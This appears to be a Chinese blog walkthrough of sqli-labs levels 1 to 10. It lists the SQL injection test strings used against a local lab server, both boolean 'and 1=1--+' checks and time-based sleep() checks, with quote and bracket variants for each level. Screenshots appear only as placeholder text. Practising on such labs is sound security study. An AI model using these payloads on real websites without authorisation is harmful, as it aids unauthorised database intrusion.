sqli-lab靶场1-10

实验1
实验2
实验3
实验4
实验5
实验6
实验7-与前几个都不同
实验8
实验9
实验10

实验1

输入：http://192.168.46.128/sqli/Less-1/?id=1
在这里插入图片描述

输入一个单引号报错
在这里插入图片描述

?id=1’and 1=1–+

有回显
在这里插入图片描述

?id=1’and 1=2–+
在这里插入图片描述

得出正确的测试语句： ?id=1’and 1=1–+

实验2

?id=1 and 1=1–+
在这里插入图片描述

?id=1 and 1=2–+
在这里插入图片描述

得出正确的测试语句：?id=1 and 1=1–+

实验3

单引号报错，双引号没反应
?id=1’)and 1=1–+
在这里插入图片描述

得出正确的测试语句：?id=1’)and 1=1–+

实验4

双引号报错
?id=1") and 1=1–+
在这里插入图片描述

?id=1") and 1=2–+
在这里插入图片描述

得出正确的测试语句：?id=1") and 1=1–+

实验5

?id=1’ and sleep(2)–+
明显有时间延长
在这里插入图片描述

得出正确的测试语句：?id=1’ and sleep(2)–+

实验6

双引号报错，单引号不报
在这里插入图片描述

?id=1" and sleep(4)–+
在这里插入图片描述

得出正确的测试语句：?id=1" and sleep(4)–+

实验7-与前几个都不同

加上双括号
?id=1’)) and 1=1–+
在这里插入图片描述

得出正确的测试语句：?id=1’)) and 1=1–+

实验8

测试sleep，可以先测试一个正常的，比较这个迟缓时间
?id=1" and sleep(4)–+（错误）一下就跳了
在这里插入图片描述

?id=1’ and sleep(1)–+ 有延迟
在这里插入图片描述

得出正确的测试语句：?id=1’ and sleep(1)–+

实验9

?id=1’ and sleep(5)–+
在这里插入图片描述

得出正确的测试语句：?id=1’ and sleep(5)–+

实验10

?id=1" and sleep(5)–+
有延迟
在这里插入图片描述

得出正确的测试语句：?id=1" and sleep(5)–+

sql注入专辑-4-sqli-lab靶场1-10

sqli-lab靶场1-10

实验1

实验2

实验3

实验4

实验5

实验6

实验7-与前几个都不同

实验8

实验9

实验10

猜你喜欢